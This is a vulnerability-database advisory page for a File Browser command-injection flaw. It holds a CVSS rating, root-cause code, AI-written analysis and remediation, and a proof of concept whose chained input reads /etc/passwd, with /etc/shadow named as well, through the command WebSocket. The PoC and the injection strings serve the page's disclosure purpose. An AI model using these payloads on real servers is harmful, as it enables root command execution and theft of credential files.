Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-reachable WebSocket API (AV:N); requires an authenticated user with Execute permission (PR:L), no UI; bypass yields full host command execution (C/I/A:H) within the server's process scope (S:U).
Primary rating from Vendor (https://github.com/filebrowser/filebrowser).
CVSS VectorVendor: https://github.com/filebrowser/filebrowser
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
6DescriptionCVE.org
> [!NOTE] > This feature has been disabled by default for all installations from v2.33.8 onwards, including for existent installations. To exploit this vulnerability, the instance administrator must turn on a feature and ignore all the warnings about known vulnerabilities. We're publishing this new advisory to make it clear that all vulnerabilities concerning this feature are disclosed. > > For more information about tracking vulnerability issues related to the Command Execution features, check https://github.com/filebrowser/filebrowser/issues/5199.
Summary
When a shell interpreter is configured (e.g. /bin/sh -c), the command allowlist can be bypassed through shell metacharacters. The allowlist validates only the first token of user input, but the entire raw string is handed to the shell - semicolons, pipes, backticks, and $() all work to chain arbitrary commands after a permitted one.
This is a distinct issue from CVE-2025-52995 (regex partial matching, fixed in 2.33.10) and CVE-2025-52903 (GTFOBins-style subcommands). The slices.Contains fix does not prevent this bypass.
Affected Location
runner/parser.go, functionParseCommand(lines 10-25)http/commands.go, functioncommandsHandler(lines 72-86)
Root Cause
ParseCommand extracts the first token via SplitCommandAndArgs for the allowlist check, then passes the entire raw input to the shell:
func ParseCommand(s *settings.Settings, raw string) (command []string, name string, err error) {
name, args, err := SplitCommandAndArgs(raw)
if len(s.Shell) == 0 || s.Shell[0] == "" {
command = append(command, name)
command = append(command, args...)
} else {
command = append(command, s.Shell...)
command = append(command, raw) // full user input, metacharacters included
}
return command, name, nil
}In commandsHandler:
if !slices.Contains(d.user.Commands, name) { // name = "ls", passes
// reject
}
cmd := exec.Command(command[0], command[1:]...)
// actually executes: /bin/sh -c "ls; id; cat /etc/shadow"name is ls - allowed. But /bin/sh -c interprets the rest.
PoC
Prerequisites:
- Command execution enabled (
--disable-exec=false) - Shell configured to
/bin/sh -c - User has Execute permission with an allowlist, e.g.
git,ls,cat
Steps:
- Log in, grab a JWT:
POST /api/login
{"username":"admin","password":"..."}- Open a WebSocket to
/api/command/with headerX-Auth: <jwt>. - Send:
ls; id; whoami; cat /etc/passwd- All four commands execute and output is returned. Sending just
whoamialone returns "Command not allowed." - the allowlist is active but bypassable.
Output:
bin
etc
home
...
===BYPASS===
uid=0(root) gid=0(root) groups=0(root),10(wheel)
root
root:x:0:0:root:/root:/bin/shTested against commit d236f1c (frontend v3.0.0) on the official Docker image filebrowser/filebrowser:latest.
Impact
Any user with Execute permission and at least one allowed command can run arbitrary OS commands at the privilege level of the server process. In the default container this is root.
AnalysisAI
Authenticated command injection in File Browser (github.com/filebrowser/filebrowser/v2 before 2.33.8) lets any user holding Execute permission bypass the command allowlist when a shell interpreter such as /bin/sh -c is configured. Because the allowlist validates only the first token while the full raw string is passed to the shell, an attacker chains arbitrary OS commands after a permitted one using metacharacters (;, |, backticks, $()), executing them at the server process privilege - root in the default Docker image. A detailed working PoC is published in the GHSA advisory; EPSS is very low (0.02%, 7th percentile) and the vulnerable Command Execution feature is disabled by default from 2.33.8 onward, including for upgraded existing installations.
Technical ContextAI
File Browser is a self-hosted Go web application for browsing and managing files, commonly run as the official filebrowser/filebrowser Docker container. The flaw is CWE-77 (Improper Neutralization of Special Elements used in a Command). In runner/parser.go, ParseCommand calls SplitCommandAndArgs to extract the first token (name) for the allowlist check, but when settings.Shell is set it appends the entire untrimmed user input as a single argument to the shell invocation (e.g. /bin/sh -c "<raw>"). In http/commands.go, commandsHandler checks slices.Contains(d.user.Commands, name) - so 'ls' passes - then runs exec.Command with the shell, which re-parses and honors all metacharacters in the rest of the string. The affected package per CPE is pkg:go/github.com_filebrowser_filebrowser_v2. This is explicitly distinct from CVE-2025-52995 (regex partial matching) and CVE-2025-52903 (GTFOBins subcommands); the prior slices.Contains hardening does not address shell metacharacter chaining.
RemediationAI
Vendor-released patch: upgrade to File Browser 2.33.8 or later, which disables the Command Execution feature by default for both new and existing installations; related allowlist hardening also landed in 2.33.10. The most effective control is to leave command execution disabled - run with --disable-exec=true (the new default) so the vulnerable code path is unreachable. If you do not need shell command execution, do not re-enable it; the vendor explicitly warns against turning the feature on. If you must keep it enabled, avoid configuring a shell interpreter (clear settings.Shell so commands run via direct exec without /bin/sh -c re-parsing), which removes the metacharacter chaining vector at the cost of losing shell features like pipes and globbing; additionally restrict Execute permission to a minimal set of trusted users, and run the container as a non-root user to limit blast radius rather than the default root. Refer to GHSA-8c9q-7855-wfxq and issue #5199 for vendor guidance.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-77 – Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39511
GHSA-8c9q-7855-wfxq